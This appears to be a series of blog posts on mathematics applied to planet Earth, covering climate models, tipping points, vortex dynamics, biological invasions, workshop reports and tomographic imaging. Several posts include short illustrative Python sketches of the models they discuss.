    At the bottom of the sea, another interesting type of pattern formation can occur. Henk Schuttelaars (TU Delft) and Huib de Swart (University of Utrecht) discuss morphodynamics, the formation and evolution of patterns such as sand banks and beach cusps by sediment transport in shallow seas. These can be studied by formulating and analyzing nonlinear models combining fluid flow, sediment transport, and bottom topography.

    The next article brings us from the bottom to the surface of the ocean. Brenny van Groesen (University of Twente) and Frits van Beckum describe a variational formulation for the motion of the ocean surface. This formulation preserves the Hamiltonian structure of the equations for the surface motion, making it very suitable for modeling and simulation of free surface waves. The authors present several examples, such as wave focusing, the occurrence of freak waves, and prediction of waves from radar observations.

    Antonios Zagaris (University of Twente) and co-workers discuss the dynamics of phytoplankton patterns in the ocean. Several types of models can be used to study phytoplankton dynamics, among them the so-called NPZ models (coupled ordinary differential equations for nutrient, phytoplankton and zooplankton) and reaction-diffusion systems for the vertical distribution of plankton and nutrient. These models can display very complex behavior, including phytoplankton blooms and spatio-temporal chaos.
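
    A minimal sketch of an NPZ box model of this general kind is given below. The functional forms (Michaelis-Menten uptake, saturating grazing) and all parameter values are generic textbook choices, assumed for illustration rather than taken from the article; total nitrogen is conserved in this closed version.

      from scipy.integrate import solve_ivp

      def npz(t, y, uptake=1.0, k_n=0.5, graze=0.6, k_p=0.3, assim=0.3, m_p=0.1, m_z=0.2):
          n, p, z = y
          u = uptake * n / (k_n + n) * p                    # nutrient uptake by phytoplankton
          g = graze * p / (k_p + p) * z                     # zooplankton grazing on phytoplankton
          dn = -u + m_p * p + m_z * z + (1.0 - assim) * g   # dead material and unassimilated grazing are remineralized
          dp = u - g - m_p * p
          dz = assim * g - m_z * z
          return [dn, dp, dz]

      sol = solve_ivp(npz, (0.0, 200.0), [2.0, 0.1, 0.05])  # initial nutrient, phytoplankton, zooplankton
      print("long-time N, P, Z:", sol.y[:, -1])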

    El Niño is a natural climate variability pattern primarily taking place in the tropical Pacific Ocean, with characteristic large-scale sea-surface temperature patterns coupled to associated changes in the atmospheric circulation. Anna von der Heydt and Henk Dijkstra (both University of Utrecht) describe the hierarchy of models that have been developed to understand the physics of this phenomenon and to make predictions of future variability. The predictability of El Niño events is still limited to about 6–9 months due to inherent nonlinear processes.

    Under slowly changing environmental conditions (for example, average rainfall), healthy ecosystems can suddenly collapse to a desert state. Such catastrophic changes can be studied using conceptual models consisting of reaction-diffusion equations, as explained by Arjen Doelman (University of Leiden) and co-workers. The vegetation patterns in these models can destabilize one by one, until the desert state remains as the only stable pattern. The region of stable periodic patterns in the space of pattern wavenumber versus model parameter (for example, rainfall) is sometimes referred to as the “Busse-balloon.”
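
    The sketch below integrates a simplified one-dimensional Klausmeier-type water/biomass system of the kind alluded to above, using a plain explicit finite-difference scheme. The equations, parameter values and diffusivities are generic assumptions for illustration; whether the uniform vegetated state destabilizes into a banded pattern depends on the parameters, in particular the rainfall and the ratio of the two diffusivities.

      import numpy as np

      nx, length = 200, 100.0
      dx, dt = length / nx, 0.005
      a, m = 2.0, 0.45                   # assumed rainfall and plant-mortality parameters
      d_w, d_n = 10.0, 0.1               # water diffuses much faster than biomass

      n_eq = (a + np.sqrt(a**2 - 4.0 * m**2)) / (2.0 * m)   # uniform vegetated steady state
      w_eq = m / n_eq

      rng = np.random.default_rng(2)
      w = np.full(nx, w_eq)
      n = n_eq * (1.0 + 0.05 * rng.standard_normal(nx))     # small random perturbation of the biomass

      def lap(u):
          """Periodic one-dimensional Laplacian by central differences."""
          return (np.roll(u, 1) - 2.0 * u + np.roll(u, -1)) / dx**2

      for _ in range(100_000):           # integrate to t = 500
          growth = w * n**2
          w = w + dt * (a - w - growth + d_w * lap(w))
          n = n + dt * (growth - m * n + d_n * lap(n))

      # A crude measure of pattern amplitude: near zero for a uniform state,
      # positive once spatial structure has developed.
      print("spatial standard deviation of biomass:", round(float(n.std()), 3))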

    In an article by Hans van Duijn and Sorin Pop (both TU Eindhoven), models for porous media flow with multiple fluids (for example, water and oil) are discussed. Such models are important for studying techniques such as geological storage of CO2 and water driven oil recovery. They consist of conservation laws and often contain nonlinearities that preclude the existence of classical solutions, leading to the study of weak solutions, admissible shocks, and saturation overshoots.

    Lightning and other types of electric discharges in the atmosphere (such as elves, sprites, and jets) are difficult to measure and to investigate experimentally. Because of their destructive power and their contribution to greenhouse gases (production of NOx, leading to ozone), numerical simulation is an important tool for studying atmospheric discharges. Christoph Koehn, Margreet Nool and Ute Ebert (all CWI Amsterdam) explain how they simulate discharges with hybrid models that combine a continuum (density) description with a particle model.

    The final article of the NAW MPE theme issue is concerned with seismic inversion. To study subsurface structure, waves are generated with acoustic sources at the Earth (or sea) surface. The reflections of these waves by subsurface layers are measured with special microphones at the surface. Inferring (i.e., reconstructing) the subsurface structure from the reflection data is a challenging inverse problem, as discussed by Chris Stolk (University of Amsterdam).

    Daan Crommelin
    Scientific Computing Group
    CWI Amsterdam
    The Netherlands
    Daan.Crommelin@cwi.nl

    Posted in General | Leave a comment

    ICMS Tipping Points Workshop

    This past week, the International Centre for Mathematical Sciences (ICMS) hosted a workshop in Edinburgh, United Kingdom. The workshop brought together an international group of mathematicians, statisticians, climate scientists, and ecologists to address the topic of tipping points [1]. In particular, the workshop provided a forum for researchers to discuss current topics related to tipping point phenomena, such as signatures of tipping in conceptual models versus in large-scale or data-driven models, how results concerning the time scale or plausibility of tipping may affect policy decisions, and the merits and pitfalls of different early warning signs of tipping.

    Tipping points, a term popularized through the writing of Malcolm Gladwell, have been defined in a broad spectrum of applications, from sociology, to economics, to climatology. The group which met at ICMS consisted of representatives from several of these backgrounds and included members of the Mathematics and Climate Research Network (MCRN), CliMathNet, the Nonlinear Dynamics in Natural Systems (NDNS+) cluster, and the Pacific Institute for Mathematical Sciences (PIMS). These groups are based in the United States, the United Kingdom, the Netherlands, and Canada, respectively.

    Throughout the workshop, the researchers discussed a qualitative definition of a tipping point. We began with the idea that a climate tipping point must:

      1. indicate a rapid change in a climate system or subsystem;
      2. be considered irreversible, or only reversible on a very long timescale; and
      3. have a significant potential impact on the earth system.

    Mathematically, we distinguish between three types of tipping, namely bifurcation-induced tipping, noise-induced tipping, and rate-induced tipping. That is not to say, however, that tipping can only occur through these three phenomena, and other possible tipping-inducing phenomena are currently being investigated. Bifurcation-induced tipping is indicated by the presence of a bifurcation of an attractor as a parameter passes through a critical value. In particular, saddle-node bifurcations are usually thought of as describing tipping points. Noise-induced tipping, which is possible when there are at least two stable states, occurs when a perturbation away from a stable attractor pushes a solution out of that attractor’s basin of attraction and into that of another attractor. Rate-induced tipping can occur when varying a parameter in time too swiftly causes a sudden transition.

    The workshop consisted of several days of research presentations, two discussion/breakout sessions, and a poster session. The presentations and posters discussed approaches toward identifying and using early warning signals for sudden regime shifts, examples of how systems exhibiting the different types of tipping have been analyzed, and the relative time scales involved in critical transitions. Non-climate systems that were posed as potential insights into tipping point phenomena included financial crises, ecological regime shifts, and theoretical dynamical systems. The presentations were recorded and will be posted on the ICMS Tipping Points Workshop Website.

    During the discussion sessions, small groups deliberated current problems that were of high interest to researchers, discussed the issues related to these topics, and then reported on their discussion or conclusions. Discussion topics included:

    • Robust/generic indicators to tipping in complex systems;
    • Mechanisms for tipping beyond saddle-nodes (bifurcations in more than one dimension);
    • Connections between the predictions in conceptual models and real-world systems;
    • Estimating the radius of the basin of attraction;
    • Nonsmooth phenomena in the climate system;
    • Testing for bi-/multistability in complex systems;
    • Spatial vs. temporal indicators of tipping;
    • Incorporating multiple time series into tipping analysis; and
    • The interaction between noise and attraction.

    Most of these discussions are still ongoing. However, one point of consensus among those at the workshop was the need to test and develop multiple indicators of early warning signs in climate systems, as well as further explore their implications and potential applications. Additionally, we discussed several paths and tools one may use to navigate between the conceptual, intermediate, and large-scale climate models, but the process must be explored further.

    Many workshop participants also emphasized the importance of improving the interface between science and policy. Although it is important to communicate between the different disciplines studying climate, it is equally vital to acknowledge that policy-makers need information that they can implement on a reasonable scale. Informing policymakers about climate assessments in a realistic fashion, which policymakers can then transform into policy decisions, is crucial in working toward decreasing the impact humans are making on the earth system.

    References:

    [1] Lenton, T.M., et al. Tipping elements in the Earth's climate system. Proceedings of the National Academy of Sciences of the USA 105, 1786-1793 (2008).

    Kaitlin Hill
    Mathematics and Climate Research Network (MCRN)

    Posted in Climate, Workshop Report | 1 Comment

    The Need for a Theory of Climate

    At the end of August, Nature Climate Change published an interesting paper showing that current global climate models (GCMs) tend to significantly overestimate the warming observed in the last two decades [1]. A few months earlier, Science had published a paper showing that four top-level global climate models, when run on a planet with no continents and entirely covered with water (an “aqua-planet”), produce cloud and precipitation patterns that are dramatically different from one model to another [2]. At the same time, most models tend to underestimate summer melting of Arctic sea ice [3] and display significant discrepancies in the reproduction of precipitation and its trends in the area affected by the Indian summer monsoon. To close the circle, precipitation data in this area also show important differences from one data set to another, especially when solid precipitation (snow) plays a dominant role [4].

    Should we use these results to conclude that climate projections cannot be trusted and that all global warming claims should be revised? Not at all. However, it would be equally wrong to ignore these findings, assume that what we know today is enough, and not invest in further research activities.

    Climate is a complex dynamical system, and we should be aware of the difficulties in properly understanding and predicting it. Global climate models are the most important, perhaps the only type of instrument that the scientific community has at its disposal to estimate the evolution of future climates, and they incorporate the results of several decades of passionate scientific inquiries. However, no model is perfect, and it would be a capital mistake to be content with the current state of description and think that everything will be solved if only we use bigger, more powerful, and faster computers, or organize climate science more along the lines of a big corporation.

    Like all sciences, the study of climate requires observations and data. Today, enormous quantities of high-resolution, precise, and reliable data about our planet are available, provided by satellites and by a dense network of ground stations. The observational data sets are now so large that we have to cope with the serious problems of storing and efficiently accessing the information provided by the many measurement systems active on Earth and making these data available to scientists, decision-makers, and end-users.

    On the other hand, data must be analyzed and interpreted. They should provide the basis for conceptual understanding and for the development of theories. Here, a few problems appear: some parts of the climate system can be described by laws based on “first principles” (the dynamics of the atmosphere and the oceans, or radiative processes in the atmosphere), while others are described by semi-empirical laws. We do not know the equations of a forest, but we do need to include vegetation in our description of climate, as forests are a crucial player in the system. In addition, even for the more “mechanical” components we cannot describe all climatic processes at once: it is not feasible to describe, at the same time, the motion of an entire ocean basin or of the planetary atmosphere and take into account the little turbulent swirls at the scale of a few centimeters.

    Figure: Some feedback mechanisms in the climate system.

    Climate still has many aspects which are poorly understood, including the role of cross-scale interactions, the dynamics of clouds and of convection, the direct and indirect effects of aerosols, the role of the biosphere, and many aspects of ocean-atmosphere exchanges. To address these issues, the whole hierarchy of modeling tools is necessary, and new ideas and interpretations must be developed. The hydrological cycle, for example, is one of the most important components of the climate of our planet and has a crucial impact on our own life. Still, precipitation intensity and variability are poorly reproduced by climate models, and a huge effort on further investigating such themes is required. Basic research on these topics should continue to provide better descriptions and—ultimately—better models for coping with societal demands. Scientific activities in this field should certainly be coordinated and harmonized by large international programs, but scientific progress will ultimately come from the passion and ingenuity of the individual researchers.

    For all these reasons, parallel to model development and scenario runs we need to focus also on the study of the “fundamentals of climate”, analyzing available data, performing new measurements, using big models and conceptual models, to explore the many fascinating and crucial processes of the climate of our planet which are still not fully understood. While continuing the necessary efforts on data collection, storage, and analysis, and the development of more sophisticated modeling tools, we also need to come up with a theory of climate. In such a construction, the role of climate dynamicists, physicists, chemists, meteorologists, oceanographers, geologists, hydrologists and biologists is crucial, but so is the role of mathematicians. A theory of climate is needed to put together the different pieces of the climatic puzzle, addressing the most important open questions, developing the proper mathematical descriptions, in a world-wide initiative to understand (and, eventually, predict) one of the most fascinating and important manifestations of Planet Earth.

    References

    [1] J.C. Fyfe, N.P. Gillett and F.W. Zwiers, Overestimated global warming over the past 20 years. Nature Climate Change, 3, 767-769, 2013.

    [2] B. Stevens and S. Bony, What are climate models missing? Science, 340, 1053-1054, 2013.

    [3] P. Rampal et al., IPCC climate models do not capture Arctic sea ice drift acceleration: Consequences in terms of projected sea ice thinning and decline. Journal of Geophysical Research — Oceans, 116, DOI: 10.1029/2011JC007110, 2011.

    [4] E. Palazzi, J. von Hardenberg and A. Provenzale, Precipitation in the Hindu-Kush Karakoram Himalaya: Observations and future scenarios. Journal of Geophysical Research — Atmospheres, 118, DOI:10.1029/2012JD018697, 2013.

    Antonello Provenzale
    Institute of Atmospheric Sciences and Climate
    Torino, Italy
    A.Provenzale@isac.cnr.it

    Posted in Climate Modeling | 1 Comment

    Probability Measures and Vortex Dynamics

    by Jin Feng (University of Kansas)

    On March 18, 1999, a small aircraft crashed near St. Louis, and the ensuing FAA investigation concluded that the crash was caused by wake turbulence from a helicopter that had just landed ahead of the plane. One of the FAA recommendations was that the characteristics of rotorcraft vortex descent should be studied more thoroughly, in particular the hazards associated with rotor wash generated by helicopters while hovering or in air-taxi operation. Incidents like this provide practical motivation for the mathematical work to model vortex dynamics and to understand the behavior of vortices over extended time periods.

    A rigorous mathematical theory of fluid flow in three dimensions is still beyond our understanding, and although the understanding of fluids in two dimensions is much better, there is still much to be done in the mathematical foundations of two-dimensional fluid mechanics. In the middle of the last century the mathematical physicist Lars Onsager proposed an explanation of commonly observed long-time behaviors of 2-D (or nearly 2-D) flows, an explanation that was based on earlier work by C. C. Lin. In Onsager’s work an important principle was codified as the “micro-canonical variational principle” (MVP), which is a relationship between the two fundamental quantities energy and entropy.
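    For readers who want to experiment, here is a minimal Python sketch of the classical 2-D point-vortex system whose long-time statistics motivate Onsager's theory; the number of vortices, their circulations, and the plain Euler time stepping are illustrative assumptions, not choices made by the research group.

        import numpy as np

        rng = np.random.default_rng(1)
        N = 20
        gamma = rng.choice([-1.0, 1.0], size=N)       # vortex circulations (illustrative)
        z = rng.uniform(-1, 1, size=(N, 2))           # vortex positions (x, y)

        def velocities(z):
            # Biot-Savart velocity induced at each vortex by all the others.
            dx = z[:, 0][:, None] - z[:, 0][None, :]
            dy = z[:, 1][:, None] - z[:, 1][None, :]
            r2 = dx**2 + dy**2 + np.eye(N)            # avoid dividing by zero on the diagonal
            u = -(gamma[None, :] * dy / r2).sum(axis=1) / (2 * np.pi)
            v = (gamma[None, :] * dx / r2).sum(axis=1) / (2 * np.pi)
            return np.stack([u, v], axis=1)

        dt = 1e-3
        for _ in range(10000):
            z = z + dt * velocities(z)
        # The empirical distribution of the vortex positions over long times is
        # the object whose energy-entropy balance the MVP describes.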

    A small research group, of which I am a member, recently met at the American Institute of Mathematics in Palo Alto with the goal of developing a general mathematical framework so that this principle can be derived rigorously from a non-equilibrium probabilistic model of fluid flow. The other group members are Fausto Gozzi (Luiss University in Rome), Tom Kurtz (University of Wisconsin), and Andrzej Swiech (Georgia Tech).

    Our approach requires tools and techniques from many areas of mathematics:

    • vortex dynamics with stochastic disturbances – highly nontrivial due to singularities hidden in the dynamics
    • partial differential equations on spaces of probability measures – highly singular state spaces
    • calculus of variations – the micro-canonical variational principle
    • theory of large deviations – developed for general metric space valued Markov processes

    Here are references that can be consulted to read more about the topics mentioned above:

    1. L. Ambrosio, N. Gigli, G. Savaré, Gradient flows in metric spaces and in the space of probability measures, Birkhauser, 2005.
    2. G. Eyink, K.R. Sreenivasan, Onsager and the theory of hydrodynamic turbulence, Reviews of Modern Physics, 78, Jan. 2006.
    3. J. Feng, M. Katsoulakis, A Comparison Principle for Hamilton-Jacobi equations related to controlled gradient flows in infinite dimensions, Archive for Rational Mechanics and Analysis, 2009.
    4. J. Feng, T. G. Kurtz, Large deviations for stochastic processes, Mathematical Surveys and Monographs, 131, American Mathematical Society, Providence, RI, 2006.
    5. J. Feng, A. Swiech, (with Appendix B by A. Stefanov), Optimal control for a mixed flow of Hamiltonian and gradient type in space of probability measures, Transactions of the AMS, 365, 3987-4039.
    6. P. L. Lions, On Euler Equations and Statistical Physics, Scuola Normale Superiore, 1997.
    7. S.R.S. Varadhan, Special Invited Paper: Large Deviations, Annals of Probability, 2008.
    Posted in Mathematics | Leave a comment

    DIMACS/CCICADA Workshop on Urban Planning for Climate Events

    As part of the workshop cluster on Sustainable Human Environments, a preworkshop on urban planning for climate events such as storms, heat events, and floods will be sponsored by DIMACS/CCICADA as part of the Mathematics of Planet Earth 2013+ (MPE2013+) program. The workshop will look at algorithmic tools to make better decisions about adaptation and mitigation for climate events.

    Participants will look at ways to understand a great deal of data that might be relevant to adaptation planning for sea level rise: flight delays, beach erosion, ferry service interruptions, salt water intrusion, water treatment plant operations, power plant location, subway and train track location, and emergency services preparedness. Participants will also consider planning for modifications in the energy, transportation, water supply, waste, and communication sectors. Changes in one sector potentially impact other sectors and so call for mathematical modeling and algorithmic analysis. Algorithmic tools for evaluating, comparing, and making decisions about adaptation and mitigation strategies will also be studied.

    More information on this workshop can be found here and information on the MPE 2013+ program can be found here. Funding is available for early career researchers to participate in the program. Early career researchers are defined as graduate students, postdocs, and faculty/researchers at the beginning of their careers. For more information on the program and financial support, please contact Eugene Fiorini at mpe2013plus@dimacs.rutgers.edu.

    Posted in Sustainability, Workshop Announcement | Leave a comment

    An Afternoon of Geosciences at “Fête de la Science” in Nice, France

    Given the MPE2013 initiative and the role of mathematics in the Earth Sciences research program at the Observatoire de la Côte d’Azur (OCA), a full “Afternoon of Geosciences” will be organized during the “Fête de la Science” on Saturday, October 12, 2013.

    The “Fête de la Science” is an annual event, which lasts five days and attracts one million visitors nationwide. In Nice, in the south of France, local branches of national laboratories collaborate with the University to set up a temporary “Village of Sciences” on the magnificent Château de Valrose campus. This village will offer a venue for interactive demonstrations, posters, discussions, lectures and debates.

    The MPE2013 afternoon will include a series of talks devoted to

    • the role of inverse problems in understanding the interior of the Earth and its exchanges with the exterior environment;
    • the study of natural hazards by rupture processes or by impacts;
    • the use of geometry in the geosciences.

    Designed for the general public, the program is expected to be one of the major attractions of the day on the campus.

    Program:

    14.00-14.15: Corinne Nicolas-Cabane, Engineer and Communications Officer at Géoazur (UNS-CNRS-OCA-IRD): Opening and introduction

    14.15-14.45: Guust Nolet, Professor at Géoazur (UNS-CNRS-OCA-IRD): Terrestrial tomography: how planet Earth loses its heat

    14.45-15.15: Stéphane Bouissou and Alexandre Chemanda, Researchers at Géoazur (UNS-CNRS-OCA-IRD): Modeling rupture processes in the Earth's outer layers: applications to the exploration and management of natural resources, waste storage, and the forecasting of geological hazards

    15.15-15.45: Stéphane Operto and Clara Castellanos, Researcher and doctoral student at Géoazur (UNS-CNRS-OCA-IRD): Seismic waves: a tool for probing the interior of the Earth

    15.45-16.15: Letizia Stephanelli, Postdoctoral researcher at Géoazur (UNS-CNRS-OCA-IRD): Order and disorder in the space around the Earth

    16.15-16.45: Sadrac Saint Fleur, Doctoral student at Géoazur (UNS-CNRS-OCA-IRD): The Leibniz (barycenter) formula and its applications

    16.45-17.15: Patrick Michel, Researcher at Lagrange (UNS-CNRS-OCA): Asteroids: space exploration and impact risks

    Posted in Public Event | Leave a comment

    The Mathematics Behind Biological Invasions

    Invasive species are a big deal today. One need only do a simple Google search to see all the exotic species that are hitching a ride on container cargo to find a niche on a new continent. The U.S. Environmental Protection Agency (EPA) has a web site devoted to invasive species; the U.S. National Oceanic and Atmospheric Administration (NOAA) also has a web site on this topic.

    There is also a lot of discussion in the scientific literature, addressing topics from ecology to biological diversity. Interestingly, there is a long history of contributions to this topic in the mathematical literature as well. One such example is the work of Mark Lewis, captured in part in his invited talk at the Mathematical Congress of the Americas in Guanajuato, Mexico, in July 2013.

    Mathematicians construct and analyze models of biological invasions, asking questions like “Can the invader establish itself (and under what conditions)?” and “Will the invading population spread (and if so, how fast)?”

    Lewis, in his talk “The Mathematics Behind Biological Invasion Processes,” looked at the second of these questions, focusing on the spread of populations. Such models must take into account the growth rate of the population under various conditions as well as the diffusion of the population.

    Populations may compete with other species or cooperate. Lewis gave two examples. The first example was the invasion of the grey squirrel into the U.K., a country where the red squirrel had been prevalent prior to the introduction of the grey squirrel in the 19th century. Interacting species can compete for similar resources. Grey squirrels are larger and more aggressive than their cousins. Will their population eventually replace the red squirrel? Lewis discussed various mathematical models and the conclusions they lead to.

    A second example is West Nile Virus, introduced into the U.S. in the late 1990s. The virus depends on hosts (birds and mosquitoes in this case) and has spread rapidly since its introduction.

    A notable feature of mathematics is that seemingly disparate phenomena can have very similar mathematical models. The mathematics lends itself to analysis that can be applied generally to many different situations. Lewis traces some of the early history of such models, going back to the work of R.A. Fisher, through to modern dynamical systems.
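    To make the connection concrete, here is a minimal Python sketch of the classical Fisher-KPP equation u_t = D u_xx + r u(1 - u), the prototype of the growth-plus-diffusion models mentioned above; the grid, parameters, and boundary treatment are illustrative assumptions, and the numerically measured front speed should come out close to the classical value 2*sqrt(r*D).

        import numpy as np

        D, r = 1.0, 1.0
        n, L = 1000, 400.0
        dx = L / n
        dt = 0.2 * dx**2 / D                      # well inside explicit-scheme stability
        x = np.linspace(0, L, n)
        u = np.where(x < 10, 1.0, 0.0)            # established population on the left

        def front_position(u, x):
            return x[np.argmax(u < 0.5)]          # first point where density drops below 1/2

        t, T = 0.0, 100.0
        p0 = front_position(u, x)
        while t < T:
            lap = (np.roll(u, -1) - 2 * u + np.roll(u, 1)) / dx**2
            lap[0], lap[-1] = lap[1], lap[-2]     # crude zero-flux boundaries
            u += dt * (D * lap + r * u * (1 - u))
            t += dt
        speed = (front_position(u, x) - p0) / T   # compare with 2 * np.sqrt(r * D) = 2.0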

    One can learn about the mathematics behind biological invasions by listening to the recording of the talk online and looking for “Mark A. Lewis – The mathematics behind biological invasion processes.”

    Posted in Biodiversity, Ecology, Mathematics | Leave a comment

    Training a New Generation of Climate Scientists

    I have been involved in the organization of a one-week educational workshop Mathematics of Climate Change, Related Hazards and Risks, which took place in Centro de Investigación Matemáticas (CIMAT) in Guanajuato (Mexico) from July 29 to August 2, 2013, as a satellite activity of the Mathematical Congress of the Americas 2013. The workshop was a joint initiative of the International Mathematical Union (IMU), the International Union of Geodesy and Geophysics (IUGG), and the International Union of Theoretical and Applied Mechanics (IUTAM), and was supported by a major grant from the International Council of Science (ICSU), and by CIMAT, the three unions IMU, IUGG and IUTAM, and the International Council of Industrial and Applied Mathematics (ICIAM). The members of the Scientific Committee were Susan Friedlander (University of Southern California/IMU), Paul Linden (University of Cambridge/IUTAM) and Ilya Zaliapin (University of Nevada, Reno/IUGG).

    The workshop was attended by 41 participants: 30 regular participants (including 17 from Latin America), eight invited speakers, and the three organizers.

    The scientific program consisted of eight minicourses of three hours each, given by Graciela Canzani (Argentina), Michael Ghil (France and US), Eugenia Kalnay (US), Roberto Mechoso (US), George Philander (US), Bala Rajaratnam (US), Eli Tziperman (US), Oscar Velaso Fuentes (Mexico), as well as a poster session, poster presentations, and two round tables. Most lecturers stayed on site for the duration of the workshop and interacted with the participants. The lectures focused on three themes: (1) Methodology of climate and natural hazards research, (2) Climate change and environmental hazards, and (3) Socio-economic implications of climate change and extreme hydro-meteorological hazards.

    Among other topics, the lectures highlighted the recent successes in meteorology, where better models and better data assimilation techniques have led to significant improvements in the quality of the forecasts, including seasonal forecasts of phenomena such as El Niño and La Niña. Global ocean circulation was explained, together with its implications for climate and the seasonal phenomena. The difficulty of including clouds in climate models and the uncertainty it induces were discussed at length: low-altitude clouds cool the atmosphere, while high-altitude clouds warm it. To understand the climate of the future, it is helpful to understand the climates of the past, from the very warm climates that could have been equable (i.e., with small differences of temperature between the Equator and the poles) to Snowball Earth, for which a model of ocean circulation was described. The mathematics of tornadoes and of Lagrangian coherent structures in ocean and atmospheric circulation were also described. Two sets of lectures dealt with the difficulties of working with and interpreting real data, whether from remote sensing or the analysis of proxies.

    The final round table was targeted towards collecting the participants’ opinions about the program and organization of the event. Most of the participants indicated that they had learned a lot and that the workshop achieved the goal of being educational and capacity building. It had allowed them to make contacts and get to know personally some of the leaders in the field, as well as to become familiar with the current research trends and challenges. Several participants mentioned that they had had trouble in the past finding mathematicians interested in applications, and some acknowledged that they were now able to apply their expertise. The contacts with geophysicists were very welcome. The rigor of the lecturers was appreciated, as well as the fact that the lecturers were conscious of the weaknesses of the models. They expressed the opinion that the lecturers behaved ethically by presenting science not as a religion and by pointing out the weak points and areas where more work or better models are needed. Among the suggestions, it was noted that it would have been good to have some time for hands-on work with data sets on a specific problem. It was also mentioned that there could have been more mathematicians as opposed to geophysicists at the workshop.

    The workshop lectures have been recorded by a professional firm. They will be posted very soon on YouTube and made accessible from the websites of CIMAT, MPE, and IMU.

    In the opinion of the organizers, such a workshop is very useful and really fills a need in the scientific community. This is particularly true for the scientists from Latin America and the Caribbean, as well as other developing regions, whose direct contact with the leading researchers in regular meetings is limited due to monetary and logistic issues. The organizers were impressed by the dedication of the lecturers to their role as instructors. It was clear that the lecturers shared the opinion of the organizers that proactive actions should be taken to encourage more young researchers to get involved in climate studies. The format of the workshop seemed adequate for that purpose, in particular in view of the fact that the lectures were videotaped to enable the students to fill in details they might have missed during the workshop.

    Christiane Rousseau

    Posted in Workshop Report | Leave a comment

    Microlocal Analysis and Imaging

    Modern society is increasingly dependent on imaging technology. Medical imaging has become a vital part of healthcare, with X-ray tomography, MRI, and ultrasound being used daily for diagnostics and treatment monitoring of various diseases; meteorological radar predicts weather, sonar scanners produce sea-floor maps, and seismometers aid in geophysical exploration.

    In these techniques, the imaged medium is probed by certain physical signals (X-rays, electromagnetic or sound waves, etc.) and the response is recorded by a set of receivers. For example, in computerized tomography (CT), X-rays are sent at various angles through the human body and the intensity of outgoing rays is measured. In ultrasound tomography sound waves are sent through the body and the transducers located on the surface of the body collect the resulting echoes.

    Imaging modalities differ in the physical nature of input and output signals, their interaction with the medium, as well as geometric setups of data acquisition. As a result, the mathematical description of the underlying processes and collected data are different, too. However, many of them fall into a common mathematical framework based on integral geometry and the wave equation. In particular, one can model scattered waves (the recorded data) as integrals along certain trajectories of a function that describes physical or biological properties of the medium. In order to create an image of the medium, one would like to recover the latter function from the data, i.e., to invert the integral transform. Integral geometry is a branch of mathematics that studies properties of such transforms and their inversion.  For example, in X-ray tomography, the data are essentially integrals of the density of the object over lines.

    In many imaging applications, recovering the unknown function modeling the medium is not possible—either because the data are complicated or because not enough data are taken to obtain exact reconstruction formulas.  In fact, full knowledge of the function is not always necessary. For example, if one is looking for a tumor in a part of the human body, then the location and shape of the tumor are already useful information even if the exact values of the tumor density are not recovered. The location of the tumor can be easily determined from the singular support of the density function of the body, which is the set of points where the function changes values abruptly. For example, the electromagnetic absorption coefficient of a cancerous tissue is far greater than that of a healthy tissue. A better understanding of the tumor regions can be obtained if we can recover the shape of the tumor as well. In other words, more precise information can be had if we can attach certain directions to the singular support at a point. In mathematical terms, such information can be obtained by looking at the Fourier transform of the function. A smooth function that is zero in the complement of any ball has the property that its Fourier transform decays rapidly at infinity; in other words, the decay at any point is faster than any negative power of the distance of that point from the origin.  One could then study the local behavior as well as the directional behavior of a function near a singular point by localizing the function near that point and by looking at the directions where its (localized) Fourier transform is not rapidly decaying. Such directions are in the wavefront set of the function. For example, if f is the function that takes the values 1 inside and 0 outside the disk in Figure 1, then the function is not smooth at the boundary circle. The wavefront directions are those normal to the boundary. Intuitively, these are the directions at which the jump in values of f at the boundary is most dramatic. Microlocal analysis is the study of such singularities and what operators (such as those in tomography) do to them.

    Figure 1 This picture represents the function that takes the values 1 inside and 0 outside the circle.  The wavefront set is the set of normals to the boundary of the disk.

    In cases where exact reconstruction formulas are not possible, approximate backprojection reconstruction can be used. Microlocal analysis of such reconstruction operators gives very useful information. Let f be a function and let x be a point one wants to image (i.e., find f(x)). The data are integrals of f over lines the X-rays traverse. Figure 2 shows what happens when f is the function that takes the values 1 inside and 0 outside the disk. For each line L in the plane, the data Rf(L) is the length of the intersection of L with the disk. So, Rf(L) is 0 if L does not meet the disk and Rf(L) is the value of the diameter of the circle if L goes through the center of the disk. For such functions g(L) defined on a set of lines one can define a backprojection operator R*, which maps g(L) to a function h(x) as follows. For every fixed x, the value h(x) is equal to the “average” of g(L) over all L passing through x. Now, applying R* to Rf one obtains the so-called normal operator of f, which is often used as an “approximate reconstruction operator” of f, i.e., h(x)=R*Rf(x) is an approximation to f. The study of normal operators and how well h(x) approximates f(x) in a given setup is one of the important problems in integral geometry. Ideally, one would like to have a situation when the wavefront set of h is the same as that of f. In this case, the singularities of the reconstruction, h, would be in the same locations as f. However, in many cases h may have some additional singularities (artifacts) or lack some of the singularities of f. One of the goals in such cases is to describe these artifacts, find their strengths, and diminish them as much as possible.

     

    Figure 2 A disk and the backprojection reconstruction from X-ray data.  The lines in the data set are horizontal and vertical and lines at 45 and 135 degrees. Note how the reconstruction “backprojects” the values of the line integrals over all points in the line.  Then, these are added up to get the reconstruction.  With lines in more angles, the reconstruction will look much better.
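    For readers who would like to reproduce a picture in the spirit of Figure 2, the following Python sketch forms the line integrals of a disk at the four angles mentioned in the caption and applies plain (unfiltered) backprojection; the geometry, grid size, and the use of image rotation to compute the projections are assumptions made only for this illustration.

        import numpy as np
        from scipy.ndimage import rotate

        n = 128
        y, x = np.mgrid[-1:1:n*1j, -1:1:n*1j]
        f = ((x**2 + (y - 0.3)**2) < 0.15**2).astype(float)   # characteristic function of a disk

        angles = [0, 45, 90, 135]                 # the four view directions of Figure 2
        h = np.zeros_like(f)
        for a in angles:
            # Line integrals along direction a (up to the pixel spacing).
            proj = rotate(f, a, reshape=False, order=1).sum(axis=0)
            # Backprojection: spread each integral back along the line it came from.
            smear = np.tile(proj, (n, 1))
            h += rotate(smear, -a, reshape=False, order=1)
        h /= len(angles)                          # crude version of the normal operator R*Rf

        # h recovers the location of the disk's boundary singularities visible to
        # these four directions, but is blurred; more angles and a sharpening
        # filter would give a much better reconstruction, as the caption notes.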

